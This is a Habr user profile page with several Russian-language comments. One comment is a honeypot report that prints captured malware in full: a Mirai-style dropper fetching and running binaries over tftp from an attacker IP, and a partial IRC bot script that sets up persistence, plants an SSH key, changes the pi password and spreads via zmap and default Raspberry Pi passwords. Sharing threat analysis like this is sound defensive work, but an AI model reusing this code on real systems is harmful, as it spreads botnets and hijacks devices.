How to become an author
My feedAll streams
Search
Write a publication
Pull to refresh
0
Karma
0
Rating
Иоганн Вайс @Osob1st

Борьба с вражеской агентурой

Send message
ProfileArticlesPostsNewsComments6
Чем грозит авария на Запорожской АЭС

Дико извиняюсь, я только спросить (с) :-)

Я помню "пугалку" 90-х, когда в некоторых СМИ циркулировали слухи о аварийном состоянии шлюзов и самой плотины. Так тогда даже учения в школах были. По сигналу "три зеленых свистка" спуститься в бомбак, там сидеть 30 минут и ждать автобусов для эвакуации, ибо по этомц сценарию ЗАЭС сначала купалась, затем горела и светилась лучами добра во все стороны.

Думаю, что тогда дяди в ГО были сурьёзные и просто так ничего не делали. Есть какие-либо модели "что будет если плотина - фсё" ?

А то как бы не вышло чего...

Total votes 2: ↑2 and ↓0+2
Look
«Лаборатория Касперского»: 36% детей лично встречаются с незнакомцами, которых они встретили в сети

В нашем городе орудовала зондеркоманда по борьбе с этим ахтунгом. Никакого (почти) рукоприкладства. Фейковый профиль и вместо ребенка - дитяти со шкаф размером. Пришедшего вежливо просили пройти в ближайшее РОВД.

This comment wasn’t rated yet0
Look
ФБР считает, что оборудование Huawei может перехватывать конфиденциальные данные американских военных

Как с языка сняли! Как говорил один бывший опер:) уполномоченный: "Все друг друга режут, душат и вешают. Идет нормальная цивилизованная жизнь"

This comment wasn’t rated yet0
Look
Исследование: чаще всего компрометируются учетные данные устройств Raspberry Pi и Linux

  1. Кибервойны, конфликты, бокс по удалёнке.

    Начало событий в Украине с точки зрения Honeypot выглядит так

    16 февраля активизировались ботнеты. Судя по информации Virustotal это разновидность Mirai.

    Если до 16 февраля были такие себе одиночные пики мощных брутфорс-атак, то сейчас вот такая картина.

    Географическое расположение - по всем странам, с использованием TOR.

    Как работает:

    После успешной атаки бот пытается загрузить скрипт по ссылкам вида:

    http://IP-Addr/x/1sh

    http://IP-Addr/x/2sh

    http://IP-Addr/x/3sh

    Скрипт в свою очередь загружает версии вредоноса под разные платформы:

Hidden text
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.x86 -g <IP-addr> ;cat uYtea.x86 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.mips -g <IP-addr> ;cat uYtea.mips >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.mpsl -g <IP-addr> ;cat uYtea.mpsl >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm -g <IP-addr> ;cat uYtea.arm >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm5 -g <IP-addr> ;cat uYtea.arm5 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm6 -g <IP-addr> ;cat uYtea.arm6 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arm7 -g <IP-addr> ;cat uYtea.arm7 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.ppc -g <IP-addr> ;cat uYtea.ppc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.m68k -g <IP-addr> ;cat uYtea.m68k >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.sh4 -g <IP-addr> ;cat uYtea.sh4 >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.spc -g <IP-addr> ;cat uYtea.spc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.arc -g <IP-addr> ;cat uYtea.arc >x ;chmod +x *;./x SSH.Selfrep
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r uYtea.x86_64 -g <IP-addr> ;cat uYtea.x86_64 >x ;chmod +x *;./x SSH.Selfrep

Так же, были замечены и другие модификации.

Пример используемых ссылок для загрузки:

ftp://anonymous:anonymous@IP/.sh
http://IP/onions1337

Функционал аналогичен.

  1. Пользователи, пароли

    15 самых популярных пользователей (данные за последний месяц)

    Hidden text

    15 самых популярных паролей (данные за последний месяц)

Hidden text

  1. География (данные за последний месяц)

    Выглядит всё это безобразие примерно вот так:

Hidden text

  1. "Малинка" и желающие забраться в малинник.

    Что касается атак именно на Raspberry Pi, явно отслеживается следующая штука.

Hidden text

Пароли

Hidden text

Скрипт не полный

C0755 4745 rbFCPCn5
#!/bin/bash

MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then
        NEWMYSELF=`mktemp -u 'XXXXXXXX'`
        sudo cp $MYSELF /opt/$NEWMYSELF
        sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
        sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
        sudo sh -c "echo 'exit 0' >> /etc/rc.local"
        sleep 1
        sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmE>

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----

-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

        arr[0]="ix1.undernet.org"
        arr[1]="ix2.undernet.org"
        arr[2]="Ashburn.Va.Us.UnderNet.org"
        arr[3]="Bucharest.RO.EU.Undernet.Org"
        arr[4]="Budapest.HU.EU.UnderNet.org"
        arr[5]="Chicago.IL.US.Undernet.org"
        rand=$[$RANDOM % 6]
        svr=${arr[$rand]}

        ....
        
        # Main loop
        while [ true ]; do
                eval "read msg_in <&3;"

                if [[ ! "$?" -eq 0 ]] ; then
                        break
                fi

                if  [[ "$msg_in" =~ "PING" ]] ; then
                        printf "PONG %s\n" "${msg_in:5}";
                        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
                        if [[ ! "$?" -eq 0 ]] ; then
                                break
                        fi
                        sleep 1
                        eval 'printf "JOIN #biret\r\n" >&3;'
                        if [[ ! "$?" -eq 0 ]] ; then
                                break
                        fi
....
                fi
        done
done
EOFMARKER

....

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
        FILE=`mktemp`
        zmap -p 22 -o $FILE -n 100000
        killall ssh scp
        for IP in `cat $FILE`
        do
                sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $M>
                sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKe>
        done
        rm -rf $FILE
        sleep 10
done
....

Эта штука - Linux/IRCBot.AU (Eset NOD)

Довольно много развелось этого, судя по honeypot.

This comment wasn’t rated yet0
Look
Лаборатория Касперского раскрыла схему мошенничества по электронной почте

У нас, на этом вашем Западе, это довольно популярная схема. Приходит счет на 200-400 местных денег на поддельные реквизиты и бухи могут "подмахнуть неглядя".

Однако, иногда, суммы могут быть и немаленькими. Наша команда как-то остановила такой запрос, лимона на два. Если правильно помню.

Так что, бдительность, граждане! :)

This comment wasn’t rated yet0
Look
«Тысячи друзей Ким Чен Ына». Как северокорейские хакеры грабили банк

В конце сентября-начале октября была рассылка на гуглопочту.

С легитимных аккаунтов отправлялсь сообщения с subject примерно такого содержания: "срочно_123QAZWSX", "обязуем_456EDCRFV", "вы должны_789EDCRFV". Всего наверное штук 10-15 сообщений. Я же любопытен. Кто, к чему меня обязывает, кому я чего должен - для агента Кремля СМЕРШ Смита всё очень важные вопросы. Ответ на которые был - Lazarus. Юниты товарища Кима.

Кстати, сама фишинговая атака была - так себе. Понятно, что фишинг. Плюс - грамматические ошибки в теме и тексте писем, ошибки в кодировке URL.

Фу и низачот.

Кормите юнитов лучше.

Total votes 5: ↑5 and ↓0+5
Look

Information

Rating
Does not participate
Location
Хараре, Зимбабве, Зимбабве
Date of birth
Registered
Activity

Your account

Sections

Information

Services

Support
© 2006–2025, Habr